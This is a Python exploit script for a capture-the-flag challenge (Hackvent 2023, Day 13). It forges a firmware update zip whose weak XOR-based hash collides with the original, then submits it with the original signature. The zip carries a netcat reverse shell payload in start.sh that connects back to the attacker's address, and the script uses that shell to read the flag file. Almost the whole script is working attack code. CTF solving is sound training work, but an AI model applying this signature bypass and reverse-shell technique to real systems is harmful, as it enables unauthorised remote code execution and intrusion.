Hackvent_2023/Day 13/exploit.py

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template --host 5e6a25e4-70e9-4467-ab1a-caba58cdf8e8.rdocker.vuln.land --port 1337
import base64
import hashlib
import re
import zipfile
from io import BytesIO

from Crypto.Hash import SHA1
from Crypto.Util.number import long_to_bytes, bytes_to_long
from pwn import *

from hackingscripts import util, rev_shell
host = args.HOST or '98db68c6-42be-4b6c-94f3-87a044a60d13.rdocker.vuln.land'
port = int(args.PORT or 1337)
def start_remote(argv=[], *a, **kw):
return connect(host, port)
def start(argv=[], *a, **kw):
return start_remote(argv, *a, **kw)
def hash_data(content):
h = 0
for i in range(0, len(content), 8):
h ^= sum([content[i+j] << 8*j for j in range(8) if i+j < len(content)])
return SHA1.new(hex(h).encode()).hexdigest()
def get_version():
io.recvuntil(b"$ ")
io.sendline(b"version")
data = io.recvuntil(b"\n\n")
return re.search(r"Version 1.3.3.7, Signature: (.*)", data.decode())[1]
def update(zip_file, signature):
io.recvuntil(b"$ ")
io.sendline(b"update")
io.recvuntil(b"> ")
io.sendline(base64.b64encode(zip_file))
io.recvuntil(b"> ")
io.sendline(signature.encode())
def send_exit():
io.recvuntil(b"$ ")
io.sendline(b"exit")
io = start()
with open("firmware.zip", "rb") as f:
orig_firmware = f.read()
orig_hash = hash_data(orig_firmware)
print("[+] Orig hash:", orig_hash)
ip_address = util.get_address()
shell_port = 1234
shell_cmd = rev_shell.generate_payload("nc", ip_address, shell_port, method="fifo", shell="/bin/sh")
zip_data = BytesIO()
with zipfile.ZipFile(zip_data, "w") as zip_file:
zip_file.writestr("start.sh", shell_cmd)
# new_zip ^ orig_firmware ^ new_zip == orig_firmware
initial_zip_data = zip_data.getvalue()
zip_data = initial_zip_data
zip_data = util.pad(zip_data, 8)
zip_data += orig_firmware
zip_data = util.pad(zip_data, 8)
zip_data += initial_zip_data
zip_hash = hash_data(zip_data)
print("[+] Update hash:", zip_hash)
assert zip_hash == orig_hash
signature = get_version()
print("[+] Signature:", signature)
shell = rev_shell.trigger_background_shell(lambda: update(zip_data, signature), shell_port)
flag = shell.exec_sync("cat /app/flag && echo")
shell.close()
send_exit()
io.close()
print("[+] Flag:", flag.decode())